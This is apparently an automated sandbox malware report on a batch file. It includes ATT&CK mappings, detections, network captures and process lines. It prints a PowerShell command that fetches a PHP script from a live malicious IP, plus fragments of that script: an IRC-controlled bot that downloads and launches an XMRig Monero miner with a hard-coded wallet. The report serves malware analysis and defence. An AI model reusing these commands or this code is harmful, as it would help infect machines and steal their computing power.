Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 PowerShell	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	11 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ceR3axDjok.bat	3%	Virustotal		Browse
ceR3axDjok.bat	0%	ReversingLabs

Source	Detection	Scanner	Label
http://45.138.16.193/xmrig	100%	Avira URL Cloud	malware
https://api.moneroocean.stream/miner/$moneroOceanWallet/stats	0%	Avira URL Cloud	safe
http://45.138.16.193/php-exe.php	100%	Avira URL Cloud	malware
http://45.138.16.193/xmrig.exe	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://45.138.16.193/php-exe.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.moneroocean.stream/miner/$moneroOceanWallet/stats	script.php.2.dr	false	Avira URL Cloud: safe	unknown
http://45.138.16.193/xmrig	script.php.2.dr	true	Avira URL Cloud: malware	unknown
http://45.138.16.193/xmrig.exe	script.php.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.138.16.193	unknown	Netherlands		62068	SPECTRAIPSpectraIPBVNL	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587642
Start date and time:	2025-01-10 16:14:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ceR3axDjok.bat renamed because original name is a hash value
Original Sample Name:	8524f6f843902e2d19f29a578f76adf6.bat
Detection:	MAL
Classification:	mal68.mine.winBAT@4/4@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .bat Stop behavior analysis, all processes terminated

Warnings

Not all processes where analyzed, report is missing behavior information
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:15:30	API Interceptor	16x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPECTRAIPSpectraIPBVNL	file.exe	Get hash	malicious	AsyncRAT, XRed, XWorm	Browse	45.141.26.134
	file.exe	Get hash	malicious	XWorm	Browse	45.141.26.134
	file.exe	Get hash	malicious	XWorm	Browse	45.141.26.134
	XClient.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.234
	Java32.exe	Get hash	malicious	XWorm	Browse	45.141.26.234
	nklmips.elf	Get hash	malicious	Unknown	Browse	89.190.159.77
	1.elf	Get hash	malicious	Unknown	Browse	45.141.239.79
	TRC.ppc.elf	Get hash	malicious	Mirai	Browse	45.144.191.245
	da6ke5KbfB.exe	Get hash	malicious	AsyncRAT, Babadeda, XWorm	Browse	45.141.26.234
	03VPFXH490.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.234

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuloniuf.ebl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbwhgkwf.v0p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\Desktop\script.php

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PHP script, Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	17813
Entropy (8bit):	4.835540598133242
Encrypted:	false
SSDEEP:	384:kpp1zmOqfu1IZ/3J71Jrn89PWp9yNQPs7Ng1MmsfkZ:kr1zpqfSUvNIWp8NQPswZ
MD5:	D7667147B8D05DFB74E6FD751A59BEDF
SHA1:	72BE204A55A40804241FFEF4ABB9526A57E428BD
SHA-256:	D71AB4C2C2206C583172075D3BAA92696BF43A9455DF113E6161C7625CA8698B
SHA-512:	63BCF27B65B93D6CDC5C232F39130E76321A67ABFE17EA3BD6E2F808535A571712CA9A83EEDCB42A1BD0F7FCDD154C6AAA1E0FE50ED4A4241B8DB4F8B9F683D6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\Desktop\script.php, Author: Joe Security
Preview:	<?php..// Configurazione del bot IRC.$server = '45.138.16.193'; // Sostituisci con l'indirizzo del server IRC.$port = 7575; // Porta del server IRC (di solito 6667 per connessioni non SSL).$channel = '#crypto'; // Canale a cui unirsi.$username = 'MyBot'; // Username del bot.$realname = 'MyBot IRC Bot'; // Realname del bot..// Configurazione MoneroOcean.$moneroOceanWallet = '42mAKKDHse31rjKojCBVznLTqUtmJE4V87ARaWtABC6SUgAs9oDk8BQjoiStvJpw7efVJKpYkURttFBpYLKeNkAm4A9HrBM'; // Sostituisci con il tuo indirizzo di portafoglio Monero.$moneroOceanApiUrl = "https://api.moneroocean.stream/miner/$moneroOceanWallet/stats"; // Endpoint per le statistiche globali..// Genera un identificatore univoco per il bot.function generateUniqueIdentifier() {. // Prova a ottenere il nome dell'utente (whoami). exec('whoami', $whoamiOutput, $whoamiStatus);. if ($whoamiStatus === 0 && !empty($whoamiOutput[0])) {. return $whoamiOutput[0]; // Usa il nome dell'utente come identificatore. }.. //

Static File Info

General

File type:	DOS batch file, ASCII text
Entropy (8bit):	4.968531646349193
TrID:
File name:	ceR3axDjok.bat
File size:	525 bytes
MD5:	8524f6f843902e2d19f29a578f76adf6
SHA1:	23e89e62096675945ab5363a0d4a940573f2aa77
SHA256:	98415c21b45b1008b74b44cae8f3c27e803d2bb4a3899c79fb079c3cc833ac36
SHA512:	32e0ddf8a7b7e9935c79eb36d66a71e016e072ed4cb7a31db3222043e4360f7de431ae62c400df312a061fe844781dbf0054cea8d60202f2895b9825c6cfef18
SSDEEP:	12:DTiO85MNzO7bkyDDkT/08JGz5AyclxRMVRT/wxjAlV4T/pHRBtgyg57P:h86NmkyfkT/Cz5AFyT/wxy4T/pRjgygV
TLSH:	6DF0569B58C934160D56CE2084B8D4C3F6BB67C49B44B46C5E917D1CE00D6DF20DB85F
File Content Preview:	@echo off.REM Imposta il nome del file PHP e l'URL da cui scaricarlo.set "php_file=script.php".set "url=http://45.138.16.193/php-exe.php"..REM Scarica il file PHP.echo Scaricando %php_file%....powershell -Command "Invoke-WebRequest -Uri '%url%' -OutFile '

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T16:15:33.220488+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49732	45.138.16.193	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:15:32.573901892 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:32.578937054 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:32.579045057 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:32.582293987 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:32.587249041 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220212936 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220288038 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220324039 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220362902 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220396996 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220431089 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220463037 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220488071 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.220489025 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.220489025 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.220499039 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220532894 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220570087 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.220577955 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.220623970 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.226663113 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.226697922 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.226733923 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.226774931 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.281841993 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.321990967 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.322015047 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.322035074 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.322133064 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.375648975 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.408793926 CET	80	49732	45.138.16.193	192.168.2.4
Jan 10, 2025 16:15:33.454157114 CET	49732	80	192.168.2.4	45.138.16.193
Jan 10, 2025 16:15:33.454158068 CET	49732	80	192.168.2.4	45.138.16.193

HTTP Request Dependency Graph

45.138.16.193

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	45.138.16.193	80	6044	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:15:32.582293987 CET	169	OUT	GET /php-exe.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 45.138.16.193 Connection: Keep-Alive
Jan 10, 2025 16:15:33.220212936 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:15:22 GMT Server: Apache/2.4.62 (Debian) Last-Modified: Wed, 08 Jan 2025 11:59:13 GMT ETag: "4595-62b309718d6e0" Accept-Ranges: bytes Content-Length: 17813 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 3c 3f 70 68 70 0a 0a 2f 2f 20 43 6f 6e 66 69 67 75 72 61 7a 69 6f 6e 65 20 64 65 6c 20 62 6f 74 20 49 52 43 0a 24 73 65 72 76 65 72 20 3d 20 27 34 35 2e 31 33 38 2e 31 36 2e 31 39 33 27 3b 20 2f 2f 20 53 6f 73 74 69 74 75 69 73 63 69 20 63 6f 6e 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 64 65 6c 20 73 65 72 76 65 72 20 49 52 43 0a 24 70 6f 72 74 20 3d 20 37 35 37 35 3b 20 2f 2f 20 50 6f 72 74 61 20 64 65 6c 20 73 65 72 76 65 72 20 49 52 43 20 28 64 69 20 73 6f 6c 69 74 6f 20 36 36 36 37 20 70 65 72 20 63 6f 6e 6e 65 73 73 69 6f 6e 69 20 6e 6f 6e 20 53 53 4c 29 0a 24 63 68 61 6e 6e 65 6c 20 3d 20 27 23 63 72 79 70 74 6f 27 3b 20 2f 2f 20 43 61 6e 61 6c 65 20 61 20 63 75 69 20 75 6e 69 72 73 69 0a 24 75 73 65 72 6e 61 6d 65 20 3d 20 27 4d 79 42 6f 74 27 3b 20 2f 2f 20 55 73 65 72 6e 61 6d 65 20 64 65 6c 20 62 6f 74 0a 24 72 65 61 6c 6e 61 6d 65 20 3d 20 27 4d 79 42 6f 74 20 49 52 43 20 42 6f 74 27 3b 20 2f 2f 20 52 65 61 6c 6e 61 6d 65 20 64 65 6c 20 62 6f 74 0a 0a 2f 2f 20 43 6f 6e 66 69 67 75 72 61 7a [TRUNCATED] Data Ascii: <?php// Configurazione del bot IRC$server = '45.138.16.193'; // Sostituisci con l'indirizzo del server IRC$port = 7575; // Porta del server IRC (di solito 6667 per connessioni non SSL)$channel = '#crypto'; // Canale a cui unirsi$username = 'MyBot'; // Username del bot$realname = 'MyBot IRC Bot'; // Realname del bot// Configurazione MoneroOcean$moneroOceanWallet = '42mAKKDHse31rjKojCBVznLTqUtmJE4V87ARaWtABC6SUgAs9oDk8BQjoiStvJpw7efVJKpYkURttFBpYLKeNkAm4A9HrBM'; // Sostituisci con il tuo indirizzo di portafoglio Monero$moneroOceanApiUrl = "https://api.moneroocean.stream/miner/$moneroOceanWallet/stats"; // Endpoint per le statistiche globali// Genera un identificatore univoco per il botfunction generateUniqueIdentifier() { // Prova a ottenere il nome dell'utente (whoami) exec('whoami', $whoamiOutput, $whoamiStatus); if ($whoamiStatus === 0 && !empty($whoamiOutput[0])) { return $whoamiOutput[0]; // Usa il nome dell'utente come id
Jan 10, 2025 16:15:33.220288038 CET	1236	IN	Data Raw: 65 6e 74 69 66 69 63 61 74 6f 72 65 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2f 2f 20 53 65 20 77 68 6f 61 6d 69 20 6e 6f 6e 20 c3 a8 20 64 69 73 70 6f 6e 69 62 69 6c 65 2c 20 70 72 6f 76 61 20 61 20 6f 74 74 65 6e 65 72 65 20 69 6c 20 6e 6f 6d 65 20 Data Ascii: entificatore } // Se whoami non disponibile, prova a ottenere il nome della macchina (hostname) $hostname = php_uname('n'); // Ottiene il nome della macchina if (!empty($hostname)) { return $hostname; // Usa il nome
Jan 10, 2025 16:15:33.220324039 CET	448	IN	Data Raw: 20 6d 65 73 73 61 67 67 69 0a 24 72 65 67 69 73 74 65 72 65 64 20 3d 20 66 61 6c 73 65 3b 20 2f 2f 20 46 6c 61 67 20 70 65 72 20 76 65 72 69 66 69 63 61 72 65 20 73 65 20 69 6c 20 62 6f 74 20 c3 a8 20 72 65 67 69 73 74 72 61 74 6f 0a 77 68 69 6c Data Ascii: messaggi$registered = false; // Flag per verificare se il bot registratowhile (!feof($socket)) { $data = fgets($socket, 4096); echo $data; // Mostra i dati ricevuti dal server IRC // Rispondere al PING del server per mantene
Jan 10, 2025 16:15:33.220362902 CET	1236	IN	Data Raw: 73 74 72 61 74 6f 20 28 6d 65 73 73 61 67 67 69 6f 20 30 30 31 29 0a 20 20 20 20 69 66 20 28 73 74 72 70 6f 73 28 24 64 61 74 61 2c 20 27 30 30 31 27 29 20 21 3d 3d 20 66 61 6c 73 65 29 20 7b 0a 20 20 20 20 20 20 20 20 24 72 65 67 69 73 74 65 72 Data Ascii: strato (messaggio 001) if (strpos($data, '001') !== false) { $registered = true; // Unione al canale dopo la registrazione fwrite($socket, "JOIN $channel\r\n"); } // Gestire i messaggi nel canale solo dopo
Jan 10, 2025 16:15:33.220396996 CET	1236	IN	Data Raw: 6e 63 74 69 6f 6e 20 69 73 58 6d 72 69 67 52 75 6e 6e 69 6e 67 28 29 20 7b 0a 20 20 20 20 69 66 20 28 73 74 72 74 6f 75 70 70 65 72 28 73 75 62 73 74 72 28 50 48 50 5f 4f 53 2c 20 30 2c 20 33 29 29 20 3d 3d 3d 20 27 57 49 4e 27 29 20 7b 0a 20 20 Data Ascii: nction isXmrigRunning() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { // Windows: verifica se win.exe, xmrig.exe, .xmrig.exe o fart.exe sono in esecuzione exec('tasklist /FI "IMAGENAME eq win.exe"', $outputWin);
Jan 10, 2025 16:15:33.220431089 CET	1236	IN	Data Raw: 61 72 74 2e 65 78 65 27 5d 20 3a 20 5b 27 77 69 6e 27 2c 20 27 78 6d 72 69 67 27 2c 20 27 2e 78 6d 72 69 67 27 2c 20 27 66 61 72 74 27 5d 3b 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 66 69 6c 65 73 20 61 73 20 24 66 69 6c 65 29 20 7b 0a 20 20 Data Ascii: art.exe'] : ['win', 'xmrig', '.xmrig', 'fart']; foreach ($files as $file) { if (file_exists($file)) { return true; // Se almeno uno dei file esiste } } return false; // Nessuno dei file esiste}// Funz
Jan 10, 2025 16:15:33.220463037 CET	1236	IN	Data Raw: 6e 74 73 28 24 6d 6f 6e 65 72 6f 4f 63 65 61 6e 41 70 69 55 72 6c 2c 20 66 61 6c 73 65 2c 20 24 63 6f 6e 74 65 78 74 29 3b 0a 20 20 20 20 69 66 20 28 24 72 65 73 70 6f 6e 73 65 20 3d 3d 3d 20 66 61 6c 73 65 29 20 7b 0a 20 20 20 20 20 20 20 20 24 Data Ascii: nts($moneroOceanApiUrl, false, $context); if ($response === false) { $error = error_get_last(); return "Errore durante la richiesta HTTP: " . $error['message']; } // Decodifica la risposta JSON $data = json_dec
Jan 10, 2025 16:15:33.220499039 CET	896	IN	Data Raw: 20 73 74 61 74 6f 20 73 63 61 72 69 63 61 74 6f 20 63 6f 72 72 65 74 74 61 6d 65 6e 74 65 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 69 6e 6f 6d Data Ascii: stato scaricato correttamente."); return; } // Rinomina il file in win.exe if (!rename($localFile, $renamedFile)) { sendMessage($socket, $channel, "Errore: Impossibile rinominare il file in win
Jan 10, 2025 16:15:33.220532894 CET	1236	IN	Data Raw: 63 6b 65 74 2c 20 24 63 68 61 6e 6e 65 6c 2c 20 22 45 72 72 6f 72 65 3a 20 49 6d 70 6f 73 73 69 62 69 6c 65 20 61 76 76 69 61 72 65 20 77 69 6e 2e 65 78 65 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 20 65 6c 73 65 69 66 20 28 73 Data Ascii: cket, $channel, "Errore: Impossibile avviare win.exe."); } } elseif (strpos($command, '!mininglinux') === 0) { // Comando mining per Linux $remoteFile = 'xmrig'; $localFile = 'xmrig'; // Scarica come xmrig
Jan 10, 2025 16:15:33.220570087 CET	1236	IN	Data Raw: 43 42 56 7a 6e 4c 54 71 55 74 6d 4a 45 34 56 38 37 41 52 61 57 74 41 42 43 36 53 55 67 41 73 39 6f 44 6b 38 42 51 6a 6f 69 53 74 76 4a 70 77 37 65 66 56 4a 4b 70 59 6b 55 52 74 74 46 42 70 59 4c 4b 65 4e 6b 41 6d 34 41 39 48 72 42 4d 20 2d 2d 70 Data Ascii: CBVznLTqUtmJE4V87ARaWtABC6SUgAs9oDk8BQjoiStvJpw7efVJKpYkURttFBpYLKeNkAm4A9HrBM --pass crypto%RANDOM% --tls --cpu-priority-3 --asm=auto --cpu-no-yield -donate-level 0 --log-file=xmrig.log > /dev/null 2>&1 &'; exec($command); //
Jan 10, 2025 16:15:33.226663113 CET	1236	IN	Data Raw: 64 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 6f 75 74 70 75 74 20 61 73 20 24 6c 69 6e 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 73 5f 6e 75 6d 65 72 Data Ascii: d) { foreach ($output as $line) { if (is_numeric($line) && $line != $currentPid) { exec("taskkill /F /PID $line"); } } } k

Target ID:	0
Start time:	10:15:29
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" "
Imagebase:	0x7ff79ba30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:15:29
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:15:29
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

